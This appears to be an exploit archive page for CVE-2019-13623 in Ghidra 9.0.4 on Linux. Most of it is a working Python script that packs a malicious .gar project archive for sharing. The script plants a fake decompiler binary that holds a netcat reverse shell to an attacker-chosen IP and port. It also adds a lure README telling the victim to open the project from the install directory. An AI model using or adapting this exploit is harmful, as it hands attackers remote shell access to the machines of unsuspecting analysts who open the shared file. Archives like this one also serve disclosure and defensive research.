Ghidra (Linux) 9.0.4 Arbitrary Code Execution

Ghidra (Linux) 9.0.4 Arbitrary Code Execution: Posted Aug 12, 2019; Authored by Etienne Lacoche; Ghidra (Linux) version 9.0.4 suffers from a .gar related arbitrary code execution vulnerability.; tags | exploit, arbitrary, code execution; systems | linux; advisories | CVE-2019-13623; SHA-256 | d8d7c325d350b463017b38852324eca682609da29b6f5b3ea847494efb0bee38; Download | Favorite | View

Ghidra (Linux) 9.0.4 Arbitrary Code Execution

import os
import inspect
import argparse
import shutil
from shutil import copyfile

print("")
print("")
print("################################################")
print("")
print("------------------CVE-2019-13623----------------")
print("")
print("################################################")
print("")
print("-----------------Ghidra-Exploit-----------------")
print("--Tested version: Ghidra Linux version <= 9.0.4-")
print("------------------------------------------------")
print("")
print("################################################")
print("")
print("----------Exploit by: Etienne Lacoche-----------")
print("---------Contact Twitter: @electr0sm0g----------")
print("")
print("------------------Discovered by:----------------")
print("---------https://blog.fxiao.me/ghidra/----------")
print("")
print("--------Exploit tested on Ubuntu 18.04----------")
print("-----------------Dependency: zip----------------")
print("")
print("################################################")
print("")
print("")

parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to input export .gar file",default=1)
parser.add_argument("ip", help="Ip to nc listener",default=1)
parser.add_argument("port", help="Port to nc listener",default=1)

args = parser.parse_args()
            
if args.ip and args.port and args.file:

    rootDirURL=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
    path = "../Ghidra/Features/Decompiler/os/linux64/decompile"
    os.system("mkdir -p ../Ghidra/Features/Decompiler/os/linux64/")
    os.system("echo 'rm -f x; mknod x p && nc "+args.ip+" "+args.port+" 0<x | /bin/bash 1>x' > decompile")
    os.system("chmod +x decompile")
    copyfile("decompile",path)
    copyfile(args.file,rootDirURL+"/"+"project.gar")
    os.system("zip -q project.gar ../Ghidra/Features/Decompiler/os/linux64/decompile")
    os.system("echo 'To fully export this archive, place project.gar to GHIDRA_INSTALL_DIR root path and open it with Restore Project at Ghidra.' > README_BEFORE_OPEN_GAR_FILE")
    os.system("zip -q project.zip README_BEFORE_OPEN_GAR_FILE")    
    os.system("zip -q project.zip project.gar") 
    os.system("rm decompile README_BEFORE_OPEN_GAR_FILE")
    os.system("rm project.gar")
    print("You can now share project.zip and start your local netcat listener.")
    print("")
    print("Project.gar must be placed and opened by victim at GHIDRA_INSTALL_DIR")
    print("root path for payload execution.")
    print("")

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Ghidra (Linux) 9.0.4 Arbitrary Code Execution

Ghidra (Linux) 9.0.4 Arbitrary Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Ghidra (Linux) 9.0.4 Arbitrary Code Execution

Share This

Ghidra (Linux) 9.0.4 Arbitrary Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems